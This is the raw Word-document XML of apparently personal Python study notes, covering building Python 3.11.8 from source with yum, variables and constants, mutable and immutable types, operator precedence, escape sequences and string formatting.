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98883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==== Python - Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E26B95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September 15, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA04D4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3:29 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2DDB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CBF8AD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B3F5000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Python3.11.8 Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ECD25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February 25, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464D176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7:07 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1687000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# Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spell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compiler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418652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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo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yum install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gcc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openssl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-devel bzip2-devel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libffi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-devel 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y;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="46EC8E5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C1E446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# Download Python .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tgz</w:t>
      </w:r>
      <w:proofErr w:type="spell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file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3033DDB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0CE9B4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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Untar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21273FF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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo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tar -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zxvf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./Python.tgz;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="79CEC74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cd .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/Python-3.11.8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF6D4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6D0BE2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# Compile &amp; Build Python3.11.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311C755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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spell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.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/configure --enable-optimizations;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCECF9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7FEC22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# Install Python3.11.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B140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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spell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make </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>altinstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DEC43C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BF1376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FE866D5" w14:textId="27256FB2" w:rsidR="00233C26" w:rsidRDefault="00B27317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Python site-packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BDB43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March 5, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6D28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9:46 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B87D1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C:\Users\IGS\AppData\Roaming\Python\Python311\site-packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA467B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72CFCA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3E56CA9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Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138648A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219D8CB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4:31 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C8A8C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BCBE19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user_iq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190</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799672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user_iq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317C13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#variables must start with lowercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215D8BE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#variables are case-sensitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCD7DC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#_user_iq = private variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F191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_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user_iq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180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552E42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'_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user_iq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_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user_iq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8082AC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user_age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_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user_iq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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5DD00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user_age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user_age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601D40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#constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2F578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#all capitals tell others this is a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const</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="463D80C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PI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3.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081341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'PI:'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PI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7B9521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Dunder variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F2B7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__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E83A91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We should NOT create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Dunders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__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFB5D1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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352EB42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a,b,c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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c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BC2785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'a:'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E8E72B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'b:'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9D3FEF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'c:'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c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4EA43A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A32D87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BA6B21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50B9917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Data Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FCD4A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2678026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4:29 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65023364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EE97270" wp14:editId="5CD83EBA">
            <wp:extent cx="2413000" cy="27559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5FB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B6C7E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C1F82E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FEE4C55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Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3465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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DEACA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7:14 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479196B2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EEB5224" wp14:editId="54BB107C">
            <wp:extent cx="2730500" cy="3403600"/>
            <wp:effectExtent l="0" t="0" r="0" b="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0E5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E5299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87982D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89D24AF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Immutable Types (Cannot change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F95185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February 13, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4192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6:49 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D69D1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6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Python 101: Learn the 5 Must-Know Concepts</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1854D7E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9EC0913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77443FC" wp14:editId="3260D358">
            <wp:extent cx="3378200" cy="1892300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4C1F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031228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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807598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int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0390B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float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD4064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bool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01184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bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0C15E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B14A2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C75E6E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These all cannot be changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228CD2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Once you define them, you cannot change them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252BD0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B29FB5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Tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B73D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x = (1, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB722D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x[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0] = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC187E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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f'x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: {x}') =&gt; Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51884A7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'tuple' object does NOT support item assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CA57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85C7D0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98A4AB" wp14:editId="45F21BD2">
            <wp:extent cx="5600700" cy="3975100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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45C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F34237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Mutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40FC46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22301C" wp14:editId="5E9CA6CB">
            <wp:extent cx="4711700" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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AC8D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496ED6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D1DEBA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FE5FC6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50FA3C6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proofErr w:type="spellStart"/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LangChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="540AC5E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February 13, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C57537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6:53 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29AB3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0" w:history="1">
        <w:proofErr w:type="spellStart"/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LangChain</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> Explained In 15 Minutes - A MUST Learn </w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/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For</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> Python Programmers</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="429A0C2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AD2518D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AB7A6EB" wp14:editId="328B51CD">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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45F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07C1A5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2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These 7 Coding Skills Give You an UNFAIR Advantage</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="440ADD2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FD437A7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5CDE371" wp14:editId="669B21D7">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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7EAD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CAA216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5CFAB8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AF44EB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97C487A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Python long projects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF5382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February 13, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78F79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6:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BFC64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4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9 HOURS of Python Projects - From Beginner to Advanced</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C2785B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42709D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86E335C" wp14:editId="66B52CBB">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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FF7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6E4510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006361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956E0F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50007F8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Mutable types (Can change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E721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February 13, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB8A4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6:50 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E4F99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list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549203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set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316543C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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14E52D4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707321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These can change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A989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95DB89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B7E8457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Operator precedence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7EC8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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2828BDB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7:14 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E041AA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print(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20 - 3 * 4) #8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7F89C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DD6777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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B1924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**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22449DC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print(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(20 - 3 ) + 2 ** 2) #21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65D72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6FBB05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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7A8E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**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08915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* /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BBCEF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+ -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A00507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491BEAE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F0F7B8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003D60C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Augmented assignment operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E374D9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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA7B14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8:18 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E47F4F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+=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398C6B5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-=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF8FE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/=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19403E7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*=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A9929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**=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146923D1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F81F9BE" wp14:editId="4856D8DF">
            <wp:extent cx="3848100" cy="2120900"/>
            <wp:effectExtent l="0" t="0" r="0" b="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B98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4CE520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A2CCCE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3BD79E8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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) and complex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA97C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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069D15E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7:18 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535E986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complex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0ABFC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int float complex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C0CE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binary number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3720F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bin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 xml:space="preserve">)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#0b101 #google binary number of 5 =&gt; 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F8FFB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Returning a binary number to a number based of 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12771B1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'0b101'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)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E566A96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6CABD9A" wp14:editId="6AD88792">
            <wp:extent cx="4572000" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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EFA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4D4DE0E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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA458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80A21AF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Long string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BB280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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FAFB7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8:17 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CFDA8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FD5E8F3" wp14:editId="1C565DF7">
            <wp:extent cx="3543300" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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C0D8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DD05C78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85F7C3C" wp14:editId="422DE9C8">
            <wp:extent cx="2806700" cy="1308100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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852A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C08335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1A5E2D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3FB932A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string-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>concentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15499C4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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD50E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8:25 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681539C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String concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115595C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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string_concatenation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'Hello'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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' '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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Andrei'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5FC60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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string_concatenation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43C4F4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'type of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string_concatenation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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string_concatenation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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB6AF4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66E6B47" wp14:editId="051689E5">
            <wp:extent cx="5359400" cy="1054100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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30A0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4A38966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CB4B67C" wp14:editId="4BC997E6">
            <wp:extent cx="2235200" cy="596900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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B015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2CD061F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14B335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CFE99E7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type conversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E631D5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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B68839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8:25 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C3509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FD53F21" wp14:editId="02E39009">
            <wp:extent cx="3759200" cy="1460500"/>
            <wp:effectExtent l="0" t="0" r="0" b="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483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B6DB3A0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F1961D6" wp14:editId="3BCB5444">
            <wp:extent cx="2273300" cy="774700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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FEE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790C96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88B3F3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10445A5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Escape sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF094A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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37845A2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8:27 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B82A76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backticks \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5D57EA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26C9956" wp14:editId="1B43298C">
            <wp:extent cx="2349500" cy="863600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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6DB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381126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A9DA744" wp14:editId="0D26D085">
            <wp:extent cx="1917700" cy="596900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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A87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CA97F8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\t = tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8EFF0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\n = New line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DB130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C75B8B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B3B9DF8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Formatted strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2927FEF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January 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E568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8:31 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB37D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Formatted strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659AEEA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name = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Johnny'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C16C0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age = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B3F8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'Hi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!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979797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. You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">re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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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years old'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DA22F0E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51A38B0" wp14:editId="79FD7E84">
            <wp:extent cx="2057400" cy="596900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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431A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2022DB52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4449CF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Formatted strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0746E18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name = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Johnny'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45471FF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age = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1D60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'Hi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!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979797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. You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">re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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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years old'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F9C336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66C584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.format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058434B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'Hi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">re </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> years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old'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.format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(name, age)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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE68FBE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CEB9234" wp14:editId="44549F4B">
            <wp:extent cx="2235200" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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484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C51FCD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05CCCE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Formatted strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D476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name = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Johnny'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B192EE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age = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502A4B9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'Hi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!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979797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. You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">re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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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years old'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1A36FC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603B91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.format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFE5F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'Hi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">re </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
